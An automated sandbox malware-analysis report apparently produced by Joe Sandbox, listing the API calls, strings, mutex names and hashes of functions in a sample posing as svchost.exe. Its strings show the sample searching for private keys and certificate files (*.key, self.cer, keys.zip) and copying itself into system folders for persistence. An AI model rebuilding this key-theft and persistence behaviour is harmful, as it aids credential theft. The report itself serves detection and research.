                                                                                                                                                                                                                • Part of subcall function 02647C80: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,76F8F380), ref: 02647CFB
                                                                                                                                                                                                                • Part of subcall function 02647C80: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,76F8F380), ref: 02647D21
                                                                                                                                                                                                                • Part of subcall function 02647C80: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,76F8F380), ref: 02647DAD
                                                                                                                                                                                                                • Part of subcall function 02647C80: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,76F8F380), ref: 02647DB4
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02648105
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02648112
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02648124
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0264812D
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02648145
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02648157
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,75775A79a,75775af8a), ref: 02648162
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02648165
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02648172
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02648175
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,75775A79a,75775af8a), ref: 02648182
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02648185
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02648192
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02648195
                                                                                                                                                                                                              • SetCaretBlinkTime.USER32(000000FF), ref: 026481A7
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 026481D5
                                                                                                                                                                                                              • StrToIntA.SHLWAPI(00000000,75775A79a,75775af8a), ref: 02648205
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,75775A79a,75775af8a), ref: 02648215
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02648218
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02648225
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02648228
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,75775A79a,75775af8a), ref: 02648235
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02648238
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02648245
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02648248
                                                                                                                                                                                                              • Sleep.KERNEL32(00001388,75775A79a,75775af8a), ref: 02648253
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 02648285
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 026482A5
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 026482BD
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 026482CF
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 026482F2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0264830C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$AdminAllocBlinkCaretQueryTimeUserValueclosesocket
                                                                                                                                                                                                              • String ID: 75775A79a$75775af8a$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                              • API String ID: 2871222221-722063887
                                                                                                                                                                                                              • Opcode ID: a80eaba03a7ec76da81b6c6b725d8a0b7934bfb2de30d1f6acd5bd9bfbd34703
                                                                                                                                                                                                              • Instruction ID: 0bce0c42915ade215b24e6a556cfc9d89ef47a57efc624f2f4617e2b552889a3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a80eaba03a7ec76da81b6c6b725d8a0b7934bfb2de30d1f6acd5bd9bfbd34703
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C651E930981311BBE7206BB09C5CF2F3B6DAF44B55F454A08F94697280DFB4D850CBA6
                                                                                                                                                                                                              Function 0265C850 Relevance: 56.3, APIs: 25, Strings: 7, Instructions: 271fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265C86F
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A689), ref: 0265C8A7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0265C8E7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265C8F1
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265C8F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0265C90A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265C911
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,crypto), ref: 0265C923
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,self.cer), ref: 0265C936
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,self.pub), ref: 0265C947
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0265C992
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0265C99F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastPath$AdminAttributesBackslashCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                              • String ID: 8A99A689$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$crypto$keys.zip$path.txt$self.cer$self.pub
                                                                                                                                                                                                              • API String ID: 3980609930-2815722089
                                                                                                                                                                                                              • Opcode ID: 54afc873f3d64ea5507e232adca0bb3c9c88a1214050ccfa5769491acff926cd
                                                                                                                                                                                                              • Instruction ID: bf0d7e176d3c6d8c056952309e571b0927fd4a8146051ec8910be58e67a46e47
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54afc873f3d64ea5507e232adca0bb3c9c88a1214050ccfa5769491acff926cd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53913631D40769ABDB26DB74CC98BEE7FA8AF49704F04469AED46D7340DB708984CB90
                                                                                                                                                                                                              Function 004018E0 Relevance: 52.7, APIs: 29, Strings: 1, Instructions: 234memoryprocessCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,76E95430,00000000,?), ref: 00401923
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                              • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 3422789474-2746444292
                                                                                                                                                                                                              • Opcode ID: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction ID: 871197f746f8751ebb4c77b71a3ee3543858eb92964eac2fec8a8f15daba1beb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D861D8B1A013157BDB209FA69C48FAB7B6CEF84750F15412AFA18B72D0DA749900CFB4
                                                                                                                                                                                                              Function 00402A70 Relevance: 52.7, APIs: 23, Strings: 7, Instructions: 223memorylibraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,76A8DB30), ref: 00402AAB
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 00402AE4
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                                • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                              • EntryPoint.SVCHOST(00000000), ref: 00402C76
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryEntryExistsExitFindFreeHeaderImageMoveNamePathPointQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                              • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                              • API String ID: 450058505-3112416296
                                                                                                                                                                                                              • Opcode ID: 29e1a8a2fb924a41aaaa96706548a4c43bedaf2d15c95e08a4fa1e443ebad758
                                                                                                                                                                                                              • Instruction ID: 5ff553944d99263ee06e3162097b0b7c6440a9b95b570a66abc1ee1896f9e821
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29e1a8a2fb924a41aaaa96706548a4c43bedaf2d15c95e08a4fa1e443ebad758
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28716FB15043419BC710EF609E9C96BBBE8BBD8300F44493EF786B72A1DB749944CB99
                                                                                                                                                                                                              Function 0265EB30 Relevance: 52.7, APIs: 26, Strings: 4, Instructions: 223memorysynchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265EB4E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a7e1), ref: 0265EB7A
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0265EBBD
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265EBC3
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265EBCB
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0265EBDC
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265EBE3
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0265EC1B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0265EC28
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a7e1,?,?), ref: 0265EC67
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0265ECA5
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265ECAC
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265ECB4
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 0265ECC5
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265ECCC
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0265ED06
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 0265ED31
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000000,?), ref: 0265ED55
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000006), ref: 0265ED72
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0265ED79
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265ED8B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265ED9C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0265EDAB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0265EDAE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0265EDBB
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0265EDBE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorHeapLastPath$CreateDirectoryFile$AdminAttributesBackslashFolderHandleMakeMutexProcessSystemUser$CloseCurrentDeleteFreeInformationReleaseSleepValidatememset
                                                                                                                                                                                                              • String ID: 8a99a7e1$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 1472338570-720286650
                                                                                                                                                                                                              • Opcode ID: 4b7d128d59e571c61fb1a584a5247b90ded47b3ea88cee1412258900588a2754
                                                                                                                                                                                                              • Instruction ID: ca519601e95f1586ddbba4169b083057f84d6393eaff7e2a622c49a4326d73b0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b7d128d59e571c61fb1a584a5247b90ded47b3ea88cee1412258900588a2754
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D710430940765AFDF218B349C58BAE7FE8AF45701F458A84ED86D7380DB71DA84CBA0
                                                                                                                                                                                                              Function 02658350 Relevance: 49.4, APIs: 24, Strings: 4, Instructions: 391fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$free$fclosefopenfreadsprintf$callocfseekrealloc
                                                                                                                                                                                                              • String ID: %s.DBF$%s.dbf$r+b$rb+
                                                                                                                                                                                                              • API String ID: 3942648141-1626032180
                                                                                                                                                                                                              • Opcode ID: 49981197890cd11dd4ed3d5f7b243a2c638bf4b6ecef69bc8752cdedb7ecacc5
                                                                                                                                                                                                              • Instruction ID: cc8f7cd94319db6c5381b87b317d3ade5122ec2caec096b19ed7dd9f1164a5d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49981197890cd11dd4ed3d5f7b243a2c638bf4b6ecef69bc8752cdedb7ecacc5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01D15AB1A042A19FC7214F3C8CD477ABFE6AF46204F5946A8EC85CB742E736D589CB50
                                                                                                                                                                                                              Function 0265C240 Relevance: 47.6, APIs: 19, Strings: 8, Instructions: 362COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$FileOperation$ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: 8A99A689$\*.key$\@rand$\ABONENTS*$\CA*$\CRL*$\self.cer$keys
                                                                                                                                                                                                              • API String ID: 3912299499-2396694000
                                                                                                                                                                                                              • Opcode ID: 89d5b71eaa4c1533ed553f81f571b88c6e6280ca0dd49690a96df98b8e272770
                                                                                                                                                                                                              • Instruction ID: 2fdd44c54ba4905d45cf3871eb25667e52c9470e5fd6fddf8ed9119e1ae63af0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89d5b71eaa4c1533ed553f81f571b88c6e6280ca0dd49690a96df98b8e272770
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36E12B70D0035A9FCB51CFA8D950AEEBBF4AF49304F1096AAD949E7310E7349694CF94
                                                                                                                                                                                                              Function 00403699 Relevance: 47.5, APIs: 25, Strings: 2, Instructions: 292memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                              • String ID: 00-->$<Actions
                                                                                                                                                                                                              • API String ID: 3028510665-1934172683
                                                                                                                                                                                                              • Opcode ID: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction ID: bc67798b7604906b9ac94ea6a24e9e769d05a344691ee016a8b24aa6f3249a27
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62A1CEB25043119BC720DF64CC49F5B7BA8EFC8751F048A29FA49A7391D774EA04CB99
                                                                                                                                                                                                              Function 026620D0 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 225fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 026620EE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a2c5), ref: 0266212F
